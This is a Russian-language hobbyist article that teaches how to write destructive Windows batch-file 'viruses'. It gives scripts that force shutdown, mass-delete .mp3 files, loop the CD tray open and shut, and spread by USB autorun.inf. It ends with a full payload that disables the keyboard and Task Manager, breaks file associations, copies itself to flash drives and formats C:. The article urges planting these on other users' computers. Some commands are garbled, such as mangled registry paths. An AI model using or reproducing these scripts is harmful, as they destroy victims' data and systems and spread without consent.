Что такое bat и как им убить винду.
Mr.RobotСтатья состоит из двух частей, первая вводная и вторая практическая.
Часть 1.
Сегодня хочу рассказать о .bat вирусах. Файлы .bat/.cmd это эдакие shell-скрипты для Windows. Но в них можно вставить все, что угодно. Вот, например
@echo off
shutdown /s /t 0
del %0
Как ты понял, это обычные команды cmd. @echo off указывает, что на экране ничего не должно происходить. Вот несколько более интересных скриптов:
DIR /S/B %SystemDrive%\*.mp3 » FIleList_mp3.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_mp3.txt) do del "%%j:%%k"
Удалит все файлы .mp3 с компа, расширение можно поменять.
echo Do » "opendisk.vbs"
echo Set oWMP = CreateObject("WMPlayer.OCX.7" ) » "opendisk.vbs"
echo Set colCDROMs = oWMP.cdromCollection » "opendisk.vbs"
echo colCDROMs.Item(d).Eject » "opendisk.vbs"
echo colCDROMs.Item(d).Eject » "opendisk.vbs"
echo Loop » "opendisk.vbs"
start "" "opendisk.vbs"
Просто будет бить юзверя дисководом. Лол.
Чтобы это все заработало, нужно чтобы юзер открыл наш файл, а это не удобно. Поэтому, нужен авторан!
Открывай блокнот, и пиши:
[autorun]
ShellExeCute="%файл_нейм%"
Сохраняй как autorun.inf. Теперь сбрасывай все на флешку, иди вставляй в комп юзера и все.
Часть 2.
Код представленный ниже отключает командную строку(не высвечивает её), отключает клаву, записывается в систему, запрещает запускать на компе exe файлы(открывает их как mp3), дату и время ставит по нулям, удрляет курсор, заражает флэшки, все ярлыки открывает в блокнот, меняет местами кнопки мыши(процесс не обратим), засоряет парками систему потом не большая пауза и после закрытия выпавшего окошка или нажатия OK, происходит снос винды!
P.S. если сносить Винду желания нету, то просто не пишите последние 5 строчек.
echo off echo (ky-ky, eto virus) rundll32 keyboard,disable copy 0 %windir/system reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f start mspaint start mspaint start mspaint start mspaint start mspaint start mspaint start mspaint start mspaint start mspaint start mspaint start mspaint start mspaint start mspaint start mspaint start mspaint start mscalc reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRestrictRun /v 1 /t REG_DWORD /d %SystemRoot%explorer.exe/f time 0:00 date 1.01.1000 del "%SystemRoot%Cursors*.*" lable C:форматирован rundll32 user,SwapMouseButton copy %0 H:run.bat copy %0 I:run.bat assoc .lnk=.txt assoc .exe=.mp3 md1 md2 md3 md4 md5 md6 md7 md8 md9 md10 pause Format C:\ Y Y Y del %0